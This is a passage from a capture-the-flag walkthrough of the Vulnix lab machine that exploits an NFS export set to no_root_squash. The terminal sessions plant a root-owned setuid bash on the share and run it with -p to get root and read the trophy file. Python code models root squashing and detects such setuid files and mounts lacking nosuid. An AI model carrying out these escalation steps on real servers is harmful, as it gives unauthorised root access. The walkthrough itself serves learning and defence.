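def effective_identity(options, client_uid, client_gid):
    """Map the uid/gid a client *claims* in its AUTH_SYS credentials to what the
    server will use. root_squash is the default and only touches uid 0;
    no_root_squash turns it off; all_squash squashes every client identity."""
    anon_uid = int(options.get("anonuid", ANON_UID))
    anon_gid = int(options.get("anongid", ANON_GID))
    if "all_squash" in options:
        return anon_uid, anon_gid
    if client_uid == 0 and "no_root_squash" not in options:
        return anon_uid, anon_gid
    return client_uid, client_gid


def mode_allows(mode, owner_uid, owner_gid, uid, gid, perm):
    """Ordinary Unix DAC check for perm in {'r','w','x'} on a file or directory.
    Unsquashed root passes r/w outright and needs only some x bit for x."""
    bit = {"r": 4, "w": 2, "x": 1}[perm]
    if uid == 0:
        return perm != "x" or bool(mode & 0o111)
    if uid == owner_uid:
        shift = 6
    elif gid == owner_gid:
        shift = 3
    else:
        shift = 0
    return bool((mode >> shift) & bit)


def can_enter_home(exports_text, client_uid, client_gid):
    """Can a client presenting client_uid/client_gid cd into /home/vulnix?"""
    _path, _client, options = parse_exports(exports_text)[0]
    uid, gid = effective_identity(options, client_uid, client_gid)
    return mode_allows(HOME_MODE, HOME_UID, HOME_GID, uid, gid, "x")


def audit(path, client, options):
    """Assumed defender-side review of one export line: the findings a
    reviewer would raise for the Vulnix configuration."""
    findings = []
    if client == "*":
        findings.append("exported to every host")
    if "no_root_squash" in options:
        findings.append("no_root_squash: remote root becomes local root")
    if "rw" in options:
        findings.append("writable export")
    return findings


if __name__ == "__main__":
    print(can_enter_home(EXPORTS_BEFORE, 0, 0))        # False: root squashed to 65534
    print(can_enter_home(EXPORTS_BEFORE, 2008, 2008))  # True: uid matched with useradd -u 2008
    print(can_enter_home(EXPORTS_AFTER, 0, 0))         # True: no_root_squash
    for export in parse_exports(EXPORTS_AFTER):
        print(audit(*export))
```

The three can_enter_home() calls reproduce the three moments of the walkthrough in order: root squashed and denied, a matching UID admitted, and root admitted once no_root_squash is in place. Note that nothing in this decision involves a password or a host check beyond the export's client list, which is why the wildcard `*` is the first thing audit() complains about.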

Unmount /tmp/nfs

root@kali:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1021936 0 1021936 0% /dev
tmpfs 206880 6376 200504 4% /run
/dev/sda1 39088480 10388040 26691816 29% /
tmpfs 1034392 304 1034088 1% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 1034392 0 1034392 0% /sys/fs/cgroup
tmpfs 206876 28 206848 1% /run/user/132
tmpfs 206876 20 206856 1% /run/user/0
192.168.1.33:/home/vulnix 792064 715840 36480 96% /tmp/nfs
root@kali:~# umount /tmp/nfs
root@kali:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1021936 0 1021936 0% /dev
tmpfs 206880 6372 200508 4% /run
/dev/sda1 39088480 10388040 26691816 29% /
tmpfs 1034392 304 1034088 1% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 1034392 0 1034392 0% /sys/fs/cgroup
tmpfs 206876 28 206848 1% /run/user/132
tmpfs 206876 20 206856 1% /run/user/0
root@kali:~#

As we have limited access (sudo -l showed that vulnix may only run sudoedit), we have to hard reboot the vulnix machine so that the NFS server re-reads /etc/exports.

Once the machine is back, remount the NFS share as root, copy /bin/bash from our local machine to /tmp/nfs and set the setuid bit on it (chmod 4777). With no_root_squash in effect the copy is created as root on the server, so a root-owned setuid bash now sits in /home/vulnix.

root@kali:~# mount -t nfs 192.168.1.33:/home/vulnix /tmp/nfs
root@kali:~# cp /bin/bash /tmp/nfs/
root@kali:~# cd /tmp/nfs/
root@kali:/tmp/nfs# ls -la
total 1116
drwxr-x--- 4 vulnix vulnix 4096 May 16 19:18 .
drwxrwxrwt 13 root root 4096 May 16 19:45 ..
-rwxr-xr-x 1 root root 1109604 May 16 19:18 bash
-rw------- 1 vulnix vulnix 13 May 16 16:41 .bash_history
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx------ 2 vulnix vulnix 4096 May 16 16:35 .cache
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 May 16 16:35 .ssh
root@kali:/tmp/nfs# chmod 4777 bash
root@kali:/tmp/nfs# ls -la
total 1116
drwxr-x--- 4 vulnix vulnix 4096 May 16 19:18 .
drwxrwxrwt 13 root root 4096 May 16 19:45 ..
-rwsrwxrwx 1 root root 1109604 May 16 19:18 bash
-rw------- 1 vulnix vulnix 13 May 16 16:41 .bash_history
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx------ 2 vulnix vulnix 4096 May 16 16:35 .cache
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 May 16 16:35 .ssh
root@kali:/tmp/nfs#

Execute the setuid bash on the vulnix machine with -p, so that bash keeps the effective UID of root instead of dropping it.

root@kali:~# ssh vulnix@192.168.1.33
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/

System information as of Wed May 17 00:12:44 BST 2017

System load: 0.0 Processes: 87
Usage of /: 90.4% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 192.168.1.33
Swap usage: 0%

=> / is using 90.4% of 773MB

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue May 16 21:42:24 2017 from 192.168.1.34
vulnix@vulnix:~$ la -la
total 1116
drwxr-x--- 4 vulnix vulnix 4096 May 17 00:18 .
drwxr-xr-x 4 root root 4096 Sep 2 2012 ..
-rwsrwxrwx 1 root root 1109604 May 17 00:18 bash
-rw------- 1 vulnix vulnix 13 May 16 21:41 .bash_history
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx------ 2 vulnix vulnix 4096 May 16 21:35 .cache
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 May 16 21:35 .ssh
vulnix@vulnix:~$ ./bash -p
./bash: /lib/i386-linux-gnu/libtinfo.so.5: no version information available (required by ./bash)
bash-4.3# id
uid=2008(vulnix) gid=2008(vulnix) euid=0(root) groups=0(root),2008(vulnix)
bash-4.3# cd /root
bash-4.3# ls
trophy.txt
bash-4.3# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
bash-4.3#
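The artefact this technique leaves behind is a root-owned setuid binary inside an exported home directory (the -rwsrwxrwx root root bash above), and the client-side mitigation is mounting NFS exports with nosuid so such a file is never honoured. The following Python, added here and not part of the original walkthrough, implements both checks: it walks a directory for setuid/setgid regular files without following symlinks, and parses /proc/mounts-style lines for NFS mounts that lack nosuid. The sample mount lines and the throwaway directory used by demo_setuid_detection() are constructed for the demo.

```python
import os
import stat
import tempfile


def is_setuid_or_setgid(mode):
    """True for a regular file carrying the setuid (04000) or setgid (02000) bit.
    Directories are excluded: setgid on a directory only controls group inheritance."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_setuid(root):
    """Walk `root` and return (path, octal mode, owner uid) for every setuid/setgid
    regular file. lstat is used so a symlink pointing at /bin/su is not reported;
    a root-owned hit under a home directory is the thing to investigate."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; keep scanning
            if is_setuid_or_setgid(st.st_mode):
                hits.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return hits


def nfs_mounts_without_nosuid(proc_mounts_text):
    """Parse /proc/mounts lines (device mountpoint fstype options dump pass) and
    return the mount points of NFS mounts whose options do not include nosuid."""
    weak = []
    for line in proc_mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mountpoint, fstype, opts = fields[1], fields[2], fields[3].split(",")
        if fstype in ("nfs", "nfs4") and "nosuid" not in opts:
            weak.append(mountpoint)
    return weak


# Constructed sample: one local disk, the walkthrough's mount as-is, and the same
# export mounted with nosuid,nodev the way a hardened client would do it.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
192.168.1.33:/home/vulnix /tmp/nfs nfs rw,relatime,vers=3,hard,addr=192.168.1.33 0 0
192.168.1.33:/home/vulnix /mnt/safe nfs rw,nosuid,nodev,relatime,vers=3,hard 0 0
"""


def demo_setuid_detection():
    """Create a throwaway directory holding one 4755 file (a stand-in for the copied
    bash) plus a harmless dotfile, scan it, and return the names that were flagged."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "bash")
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\n")
        os.chmod(path, 0o4755)
        open(os.path.join(d, ".profile"), "wb").close()
        return [os.path.basename(p) for p, _mode, _uid in find_setuid(d)]


if __name__ == "__main__":
    print(demo_setuid_detection())                   # ['bash']
    print(nfs_mounts_without_nosuid(SAMPLE_MOUNTS))  # ['/tmp/nfs']
```

Run find_setuid() against /home on the server side (or against the mounted share from a client) and compare the result with the distribution's known setuid list; a hit owned by uid 0 in a user's home directory has no legitimate reason to exist. nosuid on the client only protects that client, so it complements root_squash on the server rather than replacing it.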

Finally we are root. This was not an easy challenge as I had no idea about root squashing. But I did learn a few things while solving this challenge. Overall it is a nice one by @rebootuser.

Happy Hacking !!!
